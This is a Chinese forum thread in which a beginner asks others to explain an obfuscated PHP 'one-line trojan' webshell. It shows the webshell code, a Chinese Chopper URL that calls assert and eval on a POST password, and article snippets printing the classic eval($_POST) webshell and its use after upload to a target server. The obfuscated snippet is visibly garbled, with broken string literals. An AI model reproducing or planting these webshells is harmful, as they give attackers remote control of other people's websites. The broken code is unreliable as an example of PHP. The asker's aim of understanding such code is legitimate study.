php一句话木马解释

zxc87467908 2015-10-22 10:46:02
<?php
$_="";
$_[+""]=";
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>

菜刀里写http://site/2.php?_=assert&__=eval($_POST[‘pass’]) 密码是pass

最近看到php木马,有一种是以上写法,初学php不懂,大神们能否解释一下,谢谢!
...全文
440 3 打赏 收藏 转发到动态 举报
AI 作业
写回复
用AI写文章
3 条回复
切换为时间正序
请发表友善的回复…
发表回复
NBSstudio 2015-10-23
  • 打赏
  • 举报
 回复
第一塊PHP 用了很多界定符,要知道一個編程語言是看界定符的規範來解釋你想要程序做什麼,但是按照這些規定反過來寫就會讓PHP“誤解”導致一些底層信息洩露
Web安全-一句话木马
在很多的渗透过程中,渗透人员会上传一句话木马到目标web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?
一句话木马
一句话木马通常是指一行简短的PHP代码,可以在Web服务器上运行,实现代码执行的功能。一句话木马的代码很是短小精悍,一旦在网站上植入一句话木马,就可以远程控制他人网站,进行各种非法操作。一句话木马也可以简称...
PHP一句话木马浅析
一句话木马就是只需要一行代码的木马,短短一行代码,就...PHP一句话木马的原理是利用了PHP中的eval()。 一句话木马的原理是利用了PHP中的eval()。 注:eval因为是一个语言构造器而不是一个函数,不能被可变函数调用。
php 一句话木马简介
一句话木马就是一段简单的代码,就这短短的一行代码,就能做到和大马相当的功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 一句话木马工作原理 <?php @eval($_POST['...
PHP一句话木马
一句话木马的普通形式 <?php eval(@$_POST['password']);?> <?php ;?>是php的格式 eval是执行函数 POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句话木马通过_POST是传入的...
基础编程

21,893

社区成员

140,347

社区内容

发帖
与我相关
我的任务
社区描述
从PHP安装配置,PHP入门,PHP基础到PHP应用
社区管理员
  • 基础编程社区
加入社区
  • 近7日
  • 近30日
  • 至今

加载中

查看更多榜单
社区公告
暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章